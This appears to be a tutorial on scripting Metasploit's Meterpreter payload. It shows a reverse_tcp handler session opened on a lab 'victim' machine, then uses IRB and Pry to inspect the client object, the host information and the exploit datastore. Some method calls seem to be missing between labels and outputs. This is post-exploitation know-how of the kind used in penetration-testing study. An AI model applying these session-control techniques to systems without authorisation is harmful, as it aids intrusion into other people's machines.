From the official wiki, The Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written by Matt "skape" Miller, dozens of contributors have provided additional code, and the payload continues to be frequently updated as part of Metasploit development.

Meterpreter is a payload framework that provides APIs to interact with by writing scripts and plugins that increase its capabilities. You can find Meterpreter scripts in metasploit-framework/scripts/meterpreter those scripts that you use in post exploitation using run (e.g. getuid, getsystem, migrate, scraper, etc). Meterpreter source code is located in metasploit-framework/lib/rex/post/meterpreter.

Actually, you can't imagine the power of Meterpreter until you read its wishlist and features not just use it.

To get started, let's to get a Meterpreter shell on a victim machine to start practicing it inline then we can write some scripts

Once you get the Meterpreter shell type irb to be dropped into ruby's IRB. Most of required modules will be loaded already. Then type require 'irb/completion' to support auto-completion for the IRB console, just like the follows

msf exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...
[*] Sending stage (957486 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-11-22 06:33:00 +0300

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the Meterpreter client

>> require 'irb/completion'
=> true

If you would like to use Pry instead of irb then type pry and make the console more readable. Personally, I'd prefer pry

meterpreter > pry
_pry_.prompt = proc { "-> " }

As you can see, you've been dropped to the IRB console with an instance variable called client of the running Meterpreter.

Try this as a start

  • To list all associated methods with client instance

This will return an array.

puts client.methods.sort

Let's to check some of the interesting methods there.

  • Victim's IP address and port

  • Victim's computer information and plat form


=> "win7-64-victim\\Workshop @ WIN7-64-VICTIM"

=> "x86/win32"
  • Get the current exploit datastore

# Or 

Returns a hash contains all the exploit information that result to this Meterpreter session

{"VERBOSE"=>false, "WfsDelay"=>0, "EnableContextEncoding"=>false, "DisablePayloadHandler"=>false, "ExitOnSession"=>true, "ListenerTimeout"=>0, "payload"=>"windows/meterpreter/reverse_tcp", "LPORT"=>4444, "ReverseConnectRetries"=>5, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySession"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "lhost"=>"", "ReverseListenerBindPort"=>0, "TARGET"=>0}


Last updated